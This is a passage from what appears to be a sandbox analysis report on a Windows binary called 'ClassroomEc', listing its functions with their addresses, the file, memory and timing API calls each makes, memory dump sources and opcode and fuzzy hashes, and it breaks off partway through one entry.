Instruction Fuzzy Hash: E211A7F5E00109AFCF04DFA8D6819AEB7F5EF88300F248169E909A7355D631AE11DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A736C0 Relevance: 4.5, APIs: 3, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A736D5
_DebugHeapAllocator.LIBCPMTD ref: 00A736E1

Part of subcall function 00A76500: ??2@YAPAXI@Z.MSVCRT ref: 00A7650B

_DebugHeapAllocator.LIBCPMTD ref: 00A73702

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap$??2@_wmemmove
String ID:
API String ID: 4287629685-0
Opcode ID: 1625f688e1a68f23d55cc4acdc52d808743e648a361b7c9dd9ff3a70c490ed17
Instruction ID: 83c020c0b048539fe2a30eebdeaafa6a6e4e35ea92f650baee33f7451004a65c
Opcode Fuzzy Hash: 1625f688e1a68f23d55cc4acdc52d808743e648a361b7c9dd9ff3a70c490ed17
Instruction Fuzzy Hash: 0001D2B6500108A7CF08FF94DD529EE77789F14304F40C168F51A66191EE716E44CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00A80C60 Relevance: 4.0, APIs: 3, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441bddb707248e6cce5ff5a3ab9b2333bba79eea8ee20f541bfbf5805f82cb8c
Instruction ID: 4cf0748ca23313d31341d20a387197a6eaf190d1b535b521f27b0f94e0a10e86
Opcode Fuzzy Hash: 441bddb707248e6cce5ff5a3ab9b2333bba79eea8ee20f541bfbf5805f82cb8c
Instruction Fuzzy Hash: 66A12870E00208DFDB58EF98D991EEEB7B2BF44304F248519E405AB296D734AE49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A86D10 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00A86D4A

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: defd2acd29be71b7e68eca6921e8a119e3be9c7b6f103995e3c8b4bb43dafe3d
Instruction ID: 909b9aac283e72997dccbaf0b3b236cfc859d5e84109f0f3e680e28bc26741c8
Opcode Fuzzy Hash: defd2acd29be71b7e68eca6921e8a119e3be9c7b6f103995e3c8b4bb43dafe3d
Instruction Fuzzy Hash: 24113674A04109EFDB08EF98D480EAE77B6AF48300F148199E8069B392D730EE41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A867B0 Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 00A867E2
GetLastError.KERNEL32 ref: 00A867F1

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 46a2855e9e5e94d944f22cf64840e0e19d6423eb79600958f5955e03241eb4c2
Instruction ID: 70637a76fd91459c9fdf794e08cbba2802f1114e1eafad3b8a0c76ef09384cfe
Opcode Fuzzy Hash: 46a2855e9e5e94d944f22cf64840e0e19d6423eb79600958f5955e03241eb4c2
Instruction Fuzzy Hash: 5F015E75A00218ABDB00EFA8D8959DFBBF5EF4C310F24C29AE815D7340DA309A41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A72FA0 Relevance: 3.0, APIs: 2, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000014), ref: 00A72FBA
EndDialog.USER32(00000000,00000000), ref: 00A7301E

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: DialogSleep
String ID:
API String ID: 2355613043-0
Opcode ID: 3793d2d6577c10e22fd55df8e165941e1e031364fddd368dbc7730e07993b532
Instruction ID: b8ed7e205a0569d1dc840b82db649c14358a54396713eb9d7965f7d05a81292d
Opcode Fuzzy Hash: 3793d2d6577c10e22fd55df8e165941e1e031364fddd368dbc7730e07993b532
Instruction Fuzzy Hash: 16014071B00208EFDB14DFD8DC45BAAB7B5FB88304F10C15AE6155B290CB315A81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A76880 Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A768BC
SetEnvironmentVariableW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00A768EC

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugEnvironmentHeapVariable
String ID:
API String ID: 1617098807-0
Opcode ID: 0662ec03c921832401e0ef58763b58fc3aa09a600361f5c81954b9c3f4f7d88a
Instruction ID: 0bb90aa10c180baa90b5c22936447d4110c3e491b53d956e10634945a4613ec5
Opcode Fuzzy Hash: 0662ec03c921832401e0ef58763b58fc3aa09a600361f5c81954b9c3f4f7d88a
Instruction Fuzzy Hash: 050136B1E005099BCF04FBF8DE52ABEB3B9EB54304F50846DE41AA7252EE309F149756

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E5B0 Relevance: 3.0, APIs: 2, Instructions: 533COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00A7E7ED
??2@YAPAXI@Z.MSVCRT ref: 00A7E88E

Part of subcall function 00A89C10: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A89C1A

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 879816989-0
Opcode ID: b04ede186c28dc87f172cc442d6dd452132864e9b06f430d95c33cd111ea408d
Instruction ID: 2d18795aba84ac666d74f18e6d31905eb11b523329f16105e631354ff5e25b0d
Opcode Fuzzy Hash: b04ede186c28dc87f172cc442d6dd452132864e9b06f430d95c33cd111ea408d
Instruction Fuzzy Hash: 4E42B070A002298FCB68DB14CD91BEDB7B5AF99304F14C1E9E54E67292DB306E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A765A0 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A765AE
_DebugHeapAllocator.LIBCPMTD ref: 00A765C0

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID:
API String ID: 571936431-0
Opcode ID: 9096d092ce5265a843bb9eddd4b7e6414a854e3b3cdacde1e655d6aff4fc1456
Instruction ID: aa72c8a8420af8e76176b3218b96c588e43427ff728a28cddd6dd9e37b2ecf24
Opcode Fuzzy Hash: 9096d092ce5265a843bb9eddd4b7e6414a854e3b3cdacde1e655d6aff4fc1456
Instruction Fuzzy Hash: 08E04C7150410CABC708DB88D9A1AAEB7A9EB54744B108159F909A7341CA31AE109799

Uniqueness

Uniqueness Score: -1.00%

Function 00A72312 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A72268

Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505

Part of subcall function 00A71E40: memset.MSVCRT ref: 00A71E5E
Part of subcall function 00A71E40: _DebugHeapAllocator.LIBCPMTD ref: 00A71ED4

GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00A99730,?,?,?,00000000,?), ref: 00A722B7

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap$??3@ErrorLastmemset
String ID:
API String ID: 1417051094-0
Opcode ID: 04fcd4cc385df91bb4f6ffd6f0165cd4f9899db3634c4a74d419441cad521c6b
Instruction ID: a64113b63b72c6219dfdb65e13371602dcbea037904ac8f596c58a260f3a96a0
Opcode Fuzzy Hash: 04fcd4cc385df91bb4f6ffd6f0165cd4f9899db3634c4a74d419441cad521c6b
Instruction Fuzzy Hash: 7A114F71D10108AADB14FBA4EE52EEE777CAF54304F44C128B50AA6193EF349A19CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A72560 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?), ref: 00A725C0

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ef212935fbb909bb3ceb28c1a6ee1e8671c0314af6d419217deaca93ebccec91
Instruction ID: d1d20ad9d0b7eeee8b99ad0b5a192da83040fd964562409b138ff6e7146d9120
Opcode Fuzzy Hash: ef212935fbb909bb3ceb28c1a6ee1e8671c0314af6d419217deaca93ebccec91
Instruction Fuzzy Hash: 3801F471200104ABDB08EF59DD64BAA37A5AF84345F44C419F90E8F752DB34E9D1CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7DB30 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

codecvt.LIBCPMTD ref: 00A7DB75

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: codecvt
String ID:
API String ID: 3662085145-0
Opcode ID: 83591acb39805b45cadf740831f139ff59013fcdbe6ed1d7997e73483f31122d
Instruction ID: 60ea8bcecf6609aba63e33e5c9b9ecdc886480815333f8a543349f6415205f40
Opcode Fuzzy Hash: 83591acb39805b45cadf740831f139ff59013fcdbe6ed1d7997e73483f31122d
Instruction Fuzzy Hash: AC01CD70D01109EFCB04EFA8DA45AAEBBB0FF88304F10C5A9D40977291D7711E40DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A866C0 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,80000000,00000000,?,00A86886,00000000,?,?,00A86886,?,80000000,?,?,?), ref: 00A866F2

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3473bfe9268a8525eacbe868592a0b090ba8d14fbe7a9e1a198aa9afc050a3e8
Instruction ID: 885e7fd5a2db3284a64e79bd0fe8a62fe58bf588ccea520a7f48d0f21d645564
Opcode Fuzzy Hash: 3473bfe9268a8525eacbe868592a0b090ba8d14fbe7a9e1a198aa9afc050a3e8
Instruction Fuzzy Hash: 2EF05E75604209FFDB04DFA4D841EAF77F9FB89310F104258F9159B280DA31AE11EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A86A80 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A86AB8

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f6519598a6872d9f062f7a76695d00a16538effdd3ae1d10273156a89bb285b8
Instruction ID: 9e03f84e6c1d02921e96af74f46cb6548fdefd5d76f4ef2ff7b3c100c4b688aa
Opcode Fuzzy Hash: f6519598a6872d9f062f7a76695d00a16538effdd3ae1d10273156a89bb285b8
Instruction Fuzzy Hash: EDF0FFB5A04208FFCB04DFD8D884A9EBBB9AB48300F10C199F8189B341D731A645CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A7CA20 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

codecvt.LIBCPMTD ref: 00A7CA60

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: codecvt
String ID:
API String ID: 3662085145-0
Opcode ID: 11022d4cfc266af2f5d3f29bbdd2fb7bf31ddfbc4f0a8f88ef132e2aa352b797
Instruction ID: 886d6ace8dc041ad745272ca453134cf43b8cc54067adf82e3733232fb3f8f3d
Opcode Fuzzy Hash: 11022d4cfc266af2f5d3f29bbdd2fb7bf31ddfbc4f0a8f88ef132e2aa352b797
Instruction Fuzzy Hash: 5901B67490020CEFCB04DFA8C545AADBBB5BB48351F10C599D8096B351D770AE80DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A94A60 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

codecvt.LIBCPMTD ref: 00A94AA0

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: codecvt
String ID:
API String ID: 3662085145-0
Opcode ID: 0877466f9f167c7c3e1c31dec033a9161ed42242a87bf19012e482f4da869ad0
Instruction ID: 0ab95ac8dcdb7f44adbd80e67330536b8c9b68e8a06a4dfe282163565f78ae4f
Opcode Fuzzy Hash: 0877466f9f167c7c3e1c31dec033a9161ed42242a87bf19012e482f4da869ad0
Instruction Fuzzy Hash: 1F01C474A44208EFCB04DFA8C545AADBBF0FB48344F108699E809AB745D771AE81DF84

Uniqueness

Uniqueness Score: -1.00%

Function 00A868F0 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,?,00000000,00000000), ref: 00A86914

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d82d55ef0f7409c25b7961e6557008c4a7c2d1ae165a8961544339be2604f76c
Instruction ID: 277b64387e977a69ad3a89ba2debd414f46ae359531b9f8f8e914736b31a63dc
Opcode Fuzzy Hash: d82d55ef0f7409c25b7961e6557008c4a7c2d1ae165a8961544339be2604f76c
Instruction Fuzzy Hash: 29F01CB9904248BFCB00DFD8D845FDEBBB8AB58300F008199F90497341D631A615CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A892C0 Relevance: 1.5, APIs: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A88FF0: ??2@YAPAXI@Z.MSVCRT ref: 00A89019

_wmemmove.LIBCMTD ref: 00A892EC

Part of subcall function 00A81470: memcpy.MSVCRT ref: 00A81481

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@_wmemmovememcpy
String ID:
API String ID: 2841112568-0
Opcode ID: 19fa03c322f7b59946df5d45f3ce540ef27cd209b2abb44b35da00296593f5aa
Instruction ID: a36a3ca5fdbbdcce21189c7bfecdc944904b456c70de15ccef50f49aa373d02b
Opcode Fuzzy Hash: 19fa03c322f7b59946df5d45f3ce540ef27cd209b2abb44b35da00296593f5aa
Instruction Fuzzy Hash: 3DF0EDB5604108FFC704DF88D981C5AB7F9EF89354B108298FC089B312DA31EE10DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A89F20 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,00A81522), ref: 00A89F29

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 8bd21f332e2bf99af45dec59c6abb6a933e69aae66585f47fd802d9906089a4d
Instruction ID: 055deb2813c89927c3c48bfca5cfb7758c0fe6f7e8349371d9b281168bf9fe7d
Opcode Fuzzy Hash: 8bd21f332e2bf99af45dec59c6abb6a933e69aae66585f47fd802d9906089a4d
Instruction Fuzzy Hash: A4F09234210349ABDB04CF54C490B66BB65EB49364F24D259E94DCF350D676ED82CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00A86A30 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(00000000,?,00000000,?,?,?,00A86A77,00000000,00000000,?,?,?,00A733A6,?,?), ref: 00A86A49

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 03b765926853e4316337b1d400194b44341cbad5b92a9b02bbeb64ca65696277
Instruction ID: 92bebe390185b8ef8838f0a5e4202316ac412cffe9ad3e72d8bd670a1b83fb41
Opcode Fuzzy Hash: 03b765926853e4316337b1d400194b44341cbad5b92a9b02bbeb64ca65696277
Instruction Fuzzy Hash: F0E0ECB6A04108BB8B04DFD8EC45C9B77ACAB5C300B10825DF909C7300DA32EA10CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A71370 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00A71381

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: std::ios_base::clear
String ID:
API String ID: 1443086396-0
Opcode ID: b3493e062fb2f0b29b7aba0934e9481bbdd5119705f384922eea4d1d880fe996
Instruction ID: 5c34db621ce9c2888155c81cee72c5873ab8624cc3fae705ad509309b8b3f6a1
Opcode Fuzzy Hash: b3493e062fb2f0b29b7aba0934e9481bbdd5119705f384922eea4d1d880fe996
Instruction Fuzzy Hash: E6C0127190410CBB4704DF8CD90195EB7AC9B14300F004169B90997301C5315A1097B9

Uniqueness

Uniqueness Score: -1.00%

Function 00A73050 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
